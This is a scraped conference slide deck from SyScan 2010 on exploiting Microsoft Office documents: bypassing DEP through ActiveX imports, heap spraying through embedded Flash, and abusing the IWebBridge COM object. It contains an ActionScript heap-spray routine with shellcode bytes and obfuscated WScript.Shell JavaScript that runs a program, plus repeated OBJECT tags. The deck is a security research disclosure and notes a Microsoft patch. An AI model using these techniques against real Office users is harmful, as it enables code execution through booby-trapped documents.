Scribd
Upload
3K views64 pages

Syscan 10 - Office Is Still Yummy - Nanika TT (Publish)

Exploiting office is not easy as before. Because office has been disclosed a lot of vulnerabilities. Against DEP and ASLR. Free exploit. Think differently! No more memory hard works. An effective trick to PWN.

Uploaded by

sttsai
Copyright
© Attribution Non-Commercial (BY-NC)
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
3K views64 pages

Syscan 10 - Office Is Still Yummy - Nanika TT (Publish)

Exploiting office is not easy as before. Because office has been disclosed a lot of vulnerabilities. Against DEP and ASLR. Free exploit. Think differently! No more memory hard works. An effective trick to PWN.

Uploaded by

sttsai
Copyright
© Attribution Non-Commercial (BY-NC)
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 64

SyScan ‘10

Office Is Still Yummy


How to Defeat Memory Protections in Office Document Exploitation

Nanika <[email protected]>
TT <[email protected]>
Who we are?

Security Researchers from Taiwan


Ming-chieh Pan (a.k.a Nanika)
• Research on • Disclosed
• Vulnerability research • CVE-2006-3431
• Exploit techniques (Excel)
• Malware detection
• CVE-2006-5296
• Mobile security
(PowerPoint)
• Windows platform
• …
• Malicious document
• Member of the VRL of
COSEINC (07~08)
Sung-ting Tsai (a.k.a TT)
• Security researcher and software developer
with Trend Micro.
• Innovation Lab in south California, US.
• Research on
• Malware detection
• System vulnerability and protection
• Web security
• Cloud and virtualization security
Agenda
• Targeted attack and malicious documents.

• Against DEP and ASLR.

• Free Exploit.

• Think differently! No more memory hard works.

• An effective trick to PWN.


Targeted Attack
Targeted Attack
• It has become more and more popular

• E-mail
• Pretending someone you might trust.
• Malicious links or attachments.

• Difficult to detect
• Especially with 0day exploit.

• Malicious Document
• A very important role in targeted attacks.
Malicious Document
• Popular applications and document formats are all
hacker's target.
• Microsoft Office documents
• Portable Document Format (PDF)
• Web pages
• Flash

• Recently most of researchers are focusing on PDF


and Flash vulnerability.
• Is Office becoming safer?
Office is still yummy 
Truth
• Exploiting office is not easy as before.

• Because office has been disclosed a lot of


vulnerabilities.

• Microsoft has been trying hard to deliver patches.

• Microsoft implemented new technologies to


protect their applications.
We are going to share some
techniques that we can still use to
exploit office documents.
Against DEP
DEP is not enabled by default
in Office XP, 2003, and 2007

Done
DEP
• You can turn it on.
Against DEP (popular ways)
• Popular trick
• Using SetProcessDEPPolicy() or
NtSetInformationProcess() to disable DEP.
• Return-oriented programming

• Limitations
• ‘ret2lib’ or ROP are not easy to use when ASLR is
enabled.
• Shellcode should handle other problems.
Who can disable DEP most efficiently?
Office can disable DEP by itself. 
Against DEP (our way)

Office will disable DEP automatically when


it imports a proper ActiveX control.
Demo

Disable DEP by simply importing an


ActiveX Control

This technique can be used in Office 2000 to 2007 and


Windows XP to windows 7.
DEP Note

Make it AlwaysOn

But how?
Against ASLR
Against ASLR

• 'Heap spraying' is an exploit technique that we


can use in office document attack to against ASLR.

• By importing a Flash object into an Excel


document, we can write codes in ActionScript to
spray the heap.
package demo_fla
{
import flash.display.*;
import flash.utils.*;
dynamic public class MainTimeline extends MovieClip {
public var byteArr:ByteArray;
public var shellcode:ByteArray;
public var b:Object;
public var a:Object;
public function MainTimeline() {
addFrameScript(0, frame1);
return;
}// end function
function frame1() {
shellcode = new ByteArray();
shellcode.writeByte(144); shellcode.writeByte(144);
shellcode.writeByte(144); shellcode.writeByte(144);
shellcode.writeByte(144); shellcode.writeByte(144);
//...
// It could be a lot.
b = "\f\f\f\f";
a = "\x14\x14\x14\x14";
while(b.length < 1048576-
(shellcode.length+64))//2097152)//1048576) {
b = b + a;
}
byteArr = new ByteArray();
demo = new ByteArray();
demo.writeMultiByte(b, "iso-8859-1");
byteArr.writeByte(64);
byteArr.writeByte(64);
byteArr.writeByte(64);
byteArr.writeByte(64);
byteArr.writeMultiByte(demo, "iso-8859-1");
byteArr.writeBytes(shellcode, 0,shellcode.length);
demo1 = new ByteArray();
demo1.writeBytes(byteArr, 0,byteArr.length);
//loop ...
return;
}// end function
}
}
Demo

Spraying the heap


We need a vulnerability.
An interesting finding

8856F961-340A-11D0-A96B-00C04FD705A2
WebBrowser
Get a free exploit.
Get A Free Exploit

• Convert existing IE and Flash web vulnerabilities


to be Office vulnerabilities.

• It is easier for exploitation. You don't need to


worry about DEP, because DEP is disabled
automatically.
Risk
• Most of users will not be aware of an IE or Flash
vulnerability when they open an Office document.

• All existing browser protection mechanisms are


hard to prevent this attack.

• AV vendor only check malicious web pages, IPS


vendors only inspect web traffic, etc.
Demo 1

Effectiveness of DEP disabling

CVE-2010-0806
(IE vulnerability)
Demo 2

IE 0day = Office 0day

Microsoft Security Advisory (2219475) Vulnerability


in Windows Help and Support Center
Demo 3

Flash 0day = Office 0day

CVE-2010-1297 (Flash 0day a few days ago)


Think Differently!

Maybe we don't need hard works in


memory to against such protection.
Making a malicious office
document without smashing any
memory/buffer contents.
(New trick to PWN)
Introduce another interesting
COM object.

AE24FDAE-03C6-11D1-8B76-0080C744F389
IWebBridge
IWebBridge
• This COM object is for Office Word.
• It is similar to the object we mentioned – WebBrowser
• But this object could load local documents.

• Of course we can use above techniques to exploit the


document. However, we are going to demonstrate
other easier tricks.
Trick 1 – You have to click
demo.doc demo.js

IWebBridge

<html>
<script>
var x =new ActiveXObject(
'W'+'S'+'c'+'r'+'i'+'p'+'t'+'.'+'S'+'h'+'e'+'l'+'l'
);
x.Run('c'+'a'+'l'+'c'+'.'+'e'+'x'+'e');
</script>
</html>
<html>
<script>
var x=null;
function AX() {
try {
return new ActiveXObject(
'W'+'S'+'c'+'r'+'i'+'p'+'t'+'.'+'S'+'h'+'e'+'l'+'l'
);
} catch(e) {return null;}
}
function main() {
x=AX();
if(x==null) {
window.location.reload();
} else {
x.Run('c'+'a'+'l'+'c'+'.'+'e'+'x'+'e');
}
}
</script>
<body onLoad="main()"></body>
</html>
After 5 times …
After 10 times …
Demo
Trick 1 – You have to click

This trick exploits human patience.

However, there are 2 files.


Trick 2 – Make it together
Interesting IE behavior
demo.js

IWebBridge demo.doc
Demo
Trick 2 – Make it together

This trick exploits


interesting IE behavior.

However, on Windows 7, IE8 check


extensions.
So reload() doesn’t work in some
environments.
Trick 3 – Click to death
We don’t use reload().
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389>
<param name=url value=.\demo.doc></OBJECT>
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389>
<param name=url value=.\demo.doc></OBJECT>
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389>
<param name=url value=.\demo.doc></OBJECT>
...(1000 times)
Demo

This trick works in IE6 to IE8, Office


2000 to 2007, Windows 2000 to
Windows 7, including 64 bit
environment.
Conclusion

This is a quick guide for

LAZY office hackers.


Conclusion
• We provide some ways to see document
security from other perspectives.

• We can still make some effective exploits


without smashing any memory contents.

• New platform for exploit?


• Ex: exploit a flash vulnerability in office is
easier than in PDF.
Conclusion
• Actually Microsoft has done a lot of works to
make office safer.
• We have being doing the research for years. Our major
testing version is office 2003 and 2007.
• Recently we had rough tests, some works might not
work already.
• Update (New!)
• Microsoft has released a patch to address the
problem in June’s security update.
• http://support.microsoft.com/kb/983632
• Security Settings for ActiveX controls and OLE
objects in Office 2003 and 2007
What is your office version?
Conclusion

• Our findings are still risks for a lot of office


users.

• We will continue our works on office 2010.


Thanks

Nanika
<[email protected]>
TT
<[email protected]>

You might also like